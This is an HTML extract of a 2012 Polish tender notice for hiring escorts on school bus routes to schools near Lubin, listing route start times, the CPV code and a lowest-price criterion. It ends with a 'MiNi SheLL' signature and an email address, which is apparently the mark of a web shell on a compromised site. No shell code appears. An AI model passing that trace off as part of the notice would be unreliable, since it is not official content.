<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Gimn. nr 1 w Lubinie z siedzibą      Lubin, ul. Szpakowa 2, oddziału przedszkolnego w Przedszk. w Raszówce z siedzibą 59-307 Raszówka, ul. Kolejowa 2, Szkoły Podstawowej w Raszówce z siedzibą 59-307 Raszówka ul. 1 Maja 10 i Punktu Przedszkolnego w Wiercieniu z siedzibą Wiercień 37, 59-323 Miłoradzice z miejscowości Bukowna, Wierceń, Zimna Woda, Lisiec,  Karczowiska, Raszówka, Raszowa, Pieszków i Osiek w okr. od IX do XII 2012 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.00; Lubin: powrót 12.00 do 13.36.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Nabór personelu do opieki w czasie przewozów uczniów do Szkoły Podstawowej w Szklarach Górnych      z siedzibą Szklary Górne 48, 59-335 Lubin i Gimnazjum nr 4 w Lubinie z siedzibą 59-300 Lubin, ul. Marii Konopnickiej 5  z miejscowości Obora i Szklary Górne w okresie od września do grudnia              2012 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane godziny rozpoczęcia tras - Lubin:  rano 6.55; Lubin: powrót 12.15 do 13.00.Dokładne godziny i trasy dowozów (relacje autobusów) zostaną podane opiekunom przed rozpoczęciem roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com